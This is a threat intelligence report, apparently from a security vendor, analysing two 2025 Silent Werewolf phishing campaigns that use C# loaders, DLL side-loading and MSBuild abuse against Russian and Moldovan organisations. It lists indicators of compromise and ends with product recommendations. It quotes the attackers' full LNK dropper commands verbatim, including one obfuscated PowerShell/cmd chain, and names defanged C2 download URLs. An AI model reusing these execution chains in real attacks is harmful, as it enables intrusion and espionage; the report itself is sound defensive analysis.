Malware or LLM? Silent Werewolf employs new loaders to attack Russian and Moldovan organizations

The threat actor hinders payload retrieval, making it harder for researchers to trace the malware and analyze the cluster

In March 2025, BI.ZONE Threat Intelligence uncovered two new campaigns by Silent Werewolf. The first one focused on Russian organizations exclusively while the second targeted both Moldovan and, presumably, Russian companies. The attackers employed two separate loader instances to retrieve the malicious payload from their C2 server. Unfortunately, the payload itself was not available at the time of this research. However, a retrospective analysis of similar Silent Werewolf campaigns suggests that the threat actor used XDigo malware.

Adversaries often send phishing emails impersonating major or well‑known organizations or reference them for credibility. The stronger a brand, the more likely threat actors are to exploit its identity. Recognizable logos and other branding elements make phishing emails appear more authentic, prompting victims to open them. It is important to remember that the brands cannot be liable for the actions of criminals and associated damage.

Key findings

• Phishing emails remain the adversaries’ preferred technique for targeted attacks, particularly those involving espionage.
• The threat actor hinders payload retrieval to impede further analysis.
• The extensive use of legitimate tools and malware code obfuscation allows the attackers to stay undetected for longer periods to achieve their goals.

Campaign 1

Target countries: Russia

Target industries: energy (nuclear), aircraft, instrumentation and mechanical engineering

Start date: 2025–03–11

The adversaries distributed a previously unknown obfuscated loader coded in C#. It was disguised as a pre-action letter addressed to the chairman of the Presidium of the Almaty City Bar Association and a residential construction project.

To deliver the malicious payload, the attackers distributed phishing emails containing a download link to a ZIP file. The archive included an LNK file and a nested ZIP. The latter encompassed a legitimate executable, a malicious DLL, and a decoy PDF.

We discovered two ZIP files, proyekt.zip and dokazatelstva.zip (fig. 1 and fig. 2).

Fig. 1. Phishing email

Fig. 2. Phishing email

These archives comprise the following:

• An LNK file used to extract the nested archive and trigger the next stage.
• A ZIP file disguised as a .ini configuration file, including:
• a decoy PDF
• the legitimate executable DeviceMetadataWizard.exe (version 10.0.17763.132), digitally signed by Microsoft Corporation
• a malicious DLL that serves as a .NET loader

The LNK file finds the downloaded archive in the %USERPROFILE% directory. It also compiles the JScript.NET code embedded in the LNK to unpack the contents of the nested ZIP into a designated directory. It then runs the extracted legitimate executable, which in turn loads the malicious DLL (the C# loader).

Here is a command example from доказательства_0007093.lnk:

cmd.exe /c "set PATH=%windir%\system32;%PATH% & (for /R "%USERPROFILE%" %f in (dokazatelstva.zip) do @IF EXIST %f (chcp 65001 | echo | set /p="import System;import System.IO;import System.IO.Compression;import System.Text;import System.Diagnostics;function Main(){var args:String[]=System.Environment.GetCommandLineArgs();Directory.CreateDirectory(args[2]);System.IO.Compression.ZipFile.ExtractToDirectory(args[1], args[2]);System.IO.Compression.ZipFile.ExtractToDirectory(args[2] + "\\" + (Convert.ToChar(117)+Convert.ToChar(109)+Convert.ToChar(46)+Convert.ToChar(105)+Convert.ToChar(110)+Convert.ToChar(105)), args[2]);Process.Start("cmd.exe", "/C move " + System.Reflection.Assembly.GetExecutingAssembly().Location + " " + System.Reflection.Assembly.GetExecutingAssembly().Location + "_");}Main();">%TEMP%\UKSS1G4Q7H6S.a & for /f %j in ('dir /b /s /a:-d /o:-n "%SystemRoot%\Microsoft.Net\Framework\*jsc.exe"') do @set "_jsc=%j" & for /L %i in (1,1,3) do @if exist "%USERPROFILE%\J8ZUARAW71W7\H5GDXM70NJ.exe" (^st^art "" /MIN "%USERPROFILE%\J8ZUARAW71W7\H5GDXM70NJ.exe" & exit) else (@if exist %TEMP%\unzip.exe (%TEMP%\unzip.exe "%f" "%USERPROFILE%\J8ZUARAW71W7") else (@if not exist %TEMP%\unzip.exe_ (@if not exist %TEMP%\unzip.exe (C:\Windows\system32\forfiles.exe /P %SystemRoot% /M notepad.exe /C "cmd /c %_jsc% /nologo /r:System.IO.Compression.FileSystem.dll /out:%TEMP%\unzip.exe %TEMP%\UKSS1G4Q7H6S.a")))) ))"

This command triggers the following sequence:

• cmd.exe /c "set PATH=%windir%\system32;%PATH% adds a path to the system32 directory within the PATH environment variable, enabling access to system programs.
• for /R "%USERPROFILE%" %f in (dokazatelstva.zip) do @IF EXIST %f (...) runs a recursive search for dokazatelstva.zip in the %USERPROFILE% directory. If found, executes the @IF EXIST block, where:
  — chcp 65001 sets the encoding system to UTF-8.
  — echo | set /p="<JScript.NET-code>" >%TEMP%\UKSS1G4Q7H6S.a creates a file with a JScript.NET code.
  — for /f %j in ('dir /b /s /a:-d /o:-n "%SystemRoot%\Microsoft.Net\Framework\*jsc.exe"') do @set "_jsc=%j" searches for an EXE compiler (JScript.NET Compiler).
  — for /L %i in (1,1,3) do runs the loop three times as follows:
  — @if exist "%USERPROFILE%\J8ZUARAW71W7\H5GDXM70NJ.exe" (^st^art "" /MIN "%USERPROFILE%\J8ZUARAW71W7\H5GDXM70NJ.exe" & exit) checks for the legitimate executable. If found, runs it. If not, goes to the next condition.
  — @if exist %TEMP%\unzip.exe (%TEMP%\unzip.exe "%f" "%USERPROFILE%\J8ZUARAW71W7") checks for unzip.exe. If found, runs it with the parameters %f (path to dokazatelstva.zip) and "%USERPROFILE%\J8ZUARAW71W7. If not, goes to the next condition.
  — @if not exist %TEMP%\unzip.exe_ (@if not exist %TEMP%\unzip.exe (C:\Windows\system32\forfiles.exe /P %SystemRoot% /M notepad.exe /C "cmd /c %_jsc% /nologo /r:System.IO.Compression.FileSystem.dll /out:%TEMP%\unzip.exe %TEMP%\UKSS1G4Q7H6S.a")) checks for unzip.exe_ and unzip.exe. If neither exists, compiles %TEMP%\UKSS1G4Q7H6S.a into %TEMP%\unzip.exe by using the jsc.exe compiler. The compilation is invoked through forfiles.exe.

The unzip.exe file extracts the contents of the original ZIP into the designated directory, unpacks the nested ZIP, and renames itself to unzip.exe_ (fig. 3).

Fig. 3. Decompiled code of unzip.exe

The C# loader is a d3d9.dll library that is accessed via the H5GDXM70NJ.exe legitimate executable (DeviceMetadataWizard.exe) through DLL side-loading. The loader retrieves the malicious payload from the C2 server, saves it to the host's startup folder, and opens the decoy PDF.

The loader code is obfuscated, its strings encoded with Base64 and encrypted with XOR using a UTF-8 string key (fig. 4). Each loader instance employs a unique XOR key.

Fig. 4. Fragment of the decompiled obfuscated C# loader code

The C# loader has the following capabilities:

• Checks startup arguments.
• If run with the /startup argument, executes the downloaded malicious payload %APPDATA%\74EJ6RTFKKRS\yfutozlv.exe.
• If run without arguments, copies the test.cfg decoy to %USERPROFILE%\Documents\dokazatelstva.pdf and opens it via the explorer command %USERPROFILE%\Documents\dokazatelstva.pdf.
• Creates an asynchronous task to download the malicious payload from the URL indicated in the loader configuration data (e.g., hxxps://pdf-bazaar[.]com/files2025/?pti=npu&yay=3oKPkD33tx5Tuzz). When calling the server, uses the following User-Agent header string: "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36". The server response is decoded with Base64 and decrypted with the XOR key used for the encrypted strings. The contents are decoded again using Base64, then the loader creates the %APPDATA%\74EJ6RTFKKRS working directory and writes the final payload to %APPDATA%\74EJ6RTFKKRS\yfutozlv.exe.
• Within the same asynchronous task, spawns a separate thread and calls a function that copies H5GDXM70NJ.exe and d3d9.dll to the %APPDATA%\74EJ6RTFKKRS directory. Then, to gain persistence, creates the startapp.bat batch script in the startup folder. This script executes %APPDATA%\74EJ6RTFKKRS\H5GDXM70NJ.exe with the /startup argument.
• Within the same asynchronous task, spawns a separate thread and calls a function that executes the downloaded malicious payload %APPDATA%\74EJ6RTFKKRS\yfutozlv.exe.

The adversaries appear to run checks on target systems. If a target host does not meet certain criteria, the Llama 2 large language model (LLM) in GGUF format is downloaded from hxxps://huggingface[.]co/TheBloke/Llama-2–70B-GGUF/resolve/main/llama-2–70b.Q5_K_M.gguf (fig. 5). This hinders comprehensive analysis of the entire attack and allows the threat actor to bypass defenses such as sandboxes.

Fig. 5. Downloading llama-2-70b.Q5_K_M.gguf from the C2 server instead of the malicious payload

Decoy examples are shown in fig. 6 and fig. 7.

Fig. 6. Decoy test.cfg (dokazatelstva.pdf)

Fig. 7. Decoy test.cfg (proyekt.pdf)

Campaign 2

Target countries: Moldova, Russia (presumably)

Target industries: n/a

Start date: 2025–03–18

A new version of the C# loader was disguised as an official vacation schedule and recommendations for protecting corporate information infrastructure against ransomware attacks. This time, Silent Werewolf focused on Moldovan and Russian organizations.

As in the previous campaign, the adversaries seemed to leverage phishing to distribute malicious emails containing a download link to a ZIP archive.

We discovered two ZIP files, Grafik_SL_0525.zip and Rekomendatsii_032025.pdf.zip.

These archives comprise the following:

• Grafik_SLlnk / Rekomendatsii_032025.pdf.lnk, a malicious LNK file that includes a command to extract a nested ZIP and trigger the next stage.
• config.bin, a file that includes CMD shell commands, an MSBuild task project, the task's original C# source code, and an encrypted and encoded payload. The latter contains a decoy PDF, two legitimate DLLs (Microsoft.Build.Utilities.Core.dll and Microsoft.Build.Utilities.Core.dll), and a malicious DLL that serves as the C# loader.
• aini.dat, a file that includes random data not used by the malware.

The LNK file invokes the forfiles.exe utility to recursively search the %USERPROFILE% directory for a ZIP file matching the *[archive_name] mask (e.g., *Grafik_SL_0525.zip). The contents of each archive found are extracted to the %TEMP% folder using PowerShell. The config.bin is then read and commands are executed string by string in cmd.exe in silent mode (the /q flag).

Obfuscated LNK command:

forfiles.exe /p %USERPROFILE% /s /m *Grafik_SL_0525.zip /c "po0x77e0x720x73he0x6cl -c Expand-Archive -F @path %TEMP%|out-null;type ($env:TMP + '\config.bin') |c0x6d0x64.e0x780x65 /q|out-null"

Deobfuscated LNK command:

forfiles.exe /p %USERPROFILE% /s /m *Grafik_SL_0525.zip /c "powershell.exe -c Expand-Archive -F '[path to Grafik_SL_0525.zip]' %TEMP%|out-null;type ($env:TMP + '\config.bin') |cmd.exe /q|out-null"

The config.bin file includes the following batch commands executed string by string:

• mkdir %USERPROFILE%\Searches\winrt-{[GUID]}\
• copy /Y %TEMP%\config.bin %USERPROFILE%\Searches\winrt-{[GUID]}\
• C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe %USERPROFILE%\Searches\winrt-{[GUID]}\config.bin >nul 2>&1
• exit

Example of a newly created directory: %USERPROFILE%\Searches\winrt-{21b2da6e-5f63-4b3a-8606-fd6a2286307d}.

As a result, a working directory is created at %USERPROFILE%\Searches\winrt-{[GUID]}. The config.bin file is copied here and then MSBuild is invoked to compile and execute a Build task (fig. 8).

Compiling and executing an MSBuild task:

• exe C:\Users\[USERNAME]\Searches\winrt-{[GUID]}\config.bin
• exe" /noconfig /fullpaths @"%Temp%\[TEMP_DIRNAME]\[TEMP_FILENAME].cmdline"
• exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:%Temp%\[TEMP_FILENAME].tmp" "%Temp%\[TEMP_DIRNAME]\[TEMP_FILENAME].TMP"

Fig. 8. Batch commands in config.bin

The Build task initiates two subtasks: TaskCreator and [A-Za-z0-9]{10,14} (e.g., B0xy2l4pee34x9).

TaskCreator reads encrypted and encoded files embedded in config.bin, decrypts, decodes, and reconstructs these files, and opens a decoy PDF (%TEMP%\(Grafik_SL_0525.pdf|Rekomendatsii_032025.pdf)). The files embedded in config.bin are encrypted using a Caesar (shift) cipher and encoded using Base64 (fig. 9). The TaskCreator code serves as a dropper.

Fig. 9. Fragment of encrypted and encoded files in config.bin

Decrypted and decoded files comprise:

• Grafik_SLpdf / Rekomendatsii_032025.pdf, a decoy PDF.
• [TASK_NAME].tmp, a malicious DLL that serves as the C# loader. The DLL name is indicated in config.bin and varies from case to case (e.g., B0xy2l4pee34x9.tmp).
• Microsoft.Build.Framework.dll, a legitimate file.
• Microsoft.Build.Utilities.Core.dll, a legitimate file.

The C# loader runs with the following Base64-encoded parameters (fig. 10):

1. Path to the working directory.
2. XOR key to decrypt the malicious payload.
3. URL for downloading the malicious payload.
4. User-Agent header string.
5. Name for the downloaded file.
6. Parameter to check certain conditions within the program.

Fig. 10. Encoded parameters for the B0xy2l4pee34x9 task in config.bin

One of the loader runs, for example, uses the following decoded parameters: "%USERPROFILE%\Searches\winrt-{21b2da6e-5f63-4b3a-8606-fd6a2286307d}\", "BSX4neaFa5zahRcCcSxGudPU8GprbySA", "hxxps://myupload[.]net/pismo/Grafik_SL_0525/?xwre=VbU5NQSLczxyvEDVzIDZR6Z3Hwp48u1m", "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.0.0 Safari/537.36", "MemoryDataProcess.exe", "ea".

A randomly named task (B0xy2l4pee34x9) invokes the C# loader in the form of a DLL, with its code obfuscated using Obfuscar. Before executing its core code, the loader checks startup conditions to verify that the decoded XOR key (parameter 2) contains a substring (parameter 6) at a specific offset, the username is not "JohnDoe", the machine name is not "HAL9TH", and the NUMBER_OF_PROCESSORS variable is not null. If either of these conditions is not met, the loader terminates (fig. 11).

Fig. 11. C# loader checking startup conditions

The loader decodes Base64-encoded strings received as parameters. It then creates and deletes from 100 to 200 random files within the working directory %USERPROFILE%\Searches\winrt-{[GUID]}\[RANDOM_NAME]. Afterward, it downloads an XOR-encrypted malicious payload from the specified URL (hxxps[://]myupload[.]net/pismo/Grafik_SL_0525/?xwre=BrNCqgeaXXo94U18qUGqii5PpjGTk2va), saves it to the working directory (%USERPROFILE%\Searches\winrt-{21b2da6e-5f63-4b3a-8606-fd6a2286307d}\MemoryDataProcess.exe), decrypts and executes it. The payload is a PE file.

Decoy examples are shown in fig. 12 and fig. 13.

Fig. 12. Decoy Grafik_SL_0525.pdf

Fig. 13. Decoy Rekomendatsii_032025.pdf

Indicators of compromise

Campaign 1

ZIP
e14fdb6c0b5b64e1ca318b7ad3ac9a4fd6dec60ef03089b87199306eba6e0ca6

59b907430dde62fc7a0d1c33c38081b7dcf43777815d1abcf07e0c77f76f5894

LNK
9c1acde0627da8b518b0522d6fed15cecf35b20ed8920628e9f580cfc3f450ed

0b705938e0063e73e03645e0c7a00f7c8d8533f1912eab5bf9ad7bc44d2cf9c3

cfd0d56ca3d6c9ca232252570522c4b904be2807c461276979b1f8c551ccd4aa

536cd589cd685806b4348b9efa06843a90decae9f4135d1b11d8e74c7911f37d

Loader
95060ba948948eea9bfc801731960b97d3efceb300622630afcbccfe12c21ccd

5e34d754b0a938de7e512614f8fc6d7cd6c704f76b05044e07c97bd44bd5d591

448245612a5388074e32251a0b44769170c586cc4c2ae06cd953c7a461ce34a6

f3f2c3c5836ce6e3cb92aa6dfc0f133e15a7fd169a3d1049b7d82e49d1577273

Domains
file-bazar[.]com

pdf-bazaar[.]com

pdfdepozit[.]com

vashazagruzka365[.]com

Campaign 2

ZIP
3b283c67f597b926784d9cc07b6a4020f422dcbc1b669c67d993606e663dc5ea

23e1cde0493f7444508d56fabd6883f476b790b262040a90ae00beb31b85279c

56f62aa193a254ea2607bb1f42971ebbe4e69631d0afb1f80beb6a89b83046ca

af30d6c9431def22b93c52e7d7ba57a4290bbe6c94c7f822f0a5423c50671211

LNK
6c8916e453c0fdcd9d4e1164d1f30c38ebe65aa6d26a0fb3f5586ed3fd33d1e9

78a4e323910a0353d10fa19f8b003697d9d675ee9f15089d54dcfd8b7a9815c2

b923c1ee29c8fc5f96aae5128b6a4d414dd755ec0e11dbf636f7b92ba1e3d13e

0d1b0d35dbf72bd6518d663eb0d66a91683e94435d3659d310e202e8c169d73a

Dropper (config.bin)
3d49a2ca08b48838fde89d3f349e08de3b58f3f9ddcdd07c8dff7559b5f01cba

47b2b73e87bf21a076c7bfba34d5eee5a136d3d43d19679d14f705db034a97d7

c10d77e36dba3b410480359812c771c2185b0c586bd5e23a6d2454aba45208f2

ea89ca6c00aea17ea97374e08c93e57fe2cf73a6ea36024cd659d757b51bda41

aini.dat (random data file, not used)
aini.dat 9cb6e6b8b81e97645760cc6d05298c7079565a5c6c9de3fb760e771bb699e583

aini.dat b4f57e04bc7d0df696ece85ff6f9b306a4e2925c6fdb1e68c80726a974534ff3

Loader
73d35df23a6cce8c8b941730dec16b1f10945725ba696c7db784a5e4b65d4aa3

0d730d64432a80f950c0685f451606fde5dc27f7a58dcfe978c4cd784a08b0ef

d8bf46a9919806112200cb52f6c235726d1b8102de1231ae4a956b7d292063ba

c8268c6d2aa536937366f242abdfdae0b5432d6abc2680c4577ac2a252010182

Domains
myupload[.]net

news365[.]tech

MITRE ATT&CK

How to protect your company from such threats

Phishing is one the most popular attack vectors against organizations. You can leverage dedicated services such as BI.ZONE Mail Security to filter out unwanted messages and protect your email communications. The solution carefully examines every incoming message to identify and block illegitimate content. BI.ZONE Mail Security uses over 600 filtering mechanisms based on machine learning, statistical, signature, and heuristic analysis. This kind of inspection does not slow down the delivery of secure emails.

Attacks similar to those by Silent Werewolf are not only critical to detect but also to neutralize before they affect the infrastructure. To protect your company against advanced threats, we recommend implementing endpoint detection and response practices, for instance, BI.ZONE EDR. The service enables early detection of attacks and immediate incident response, either automated or manual.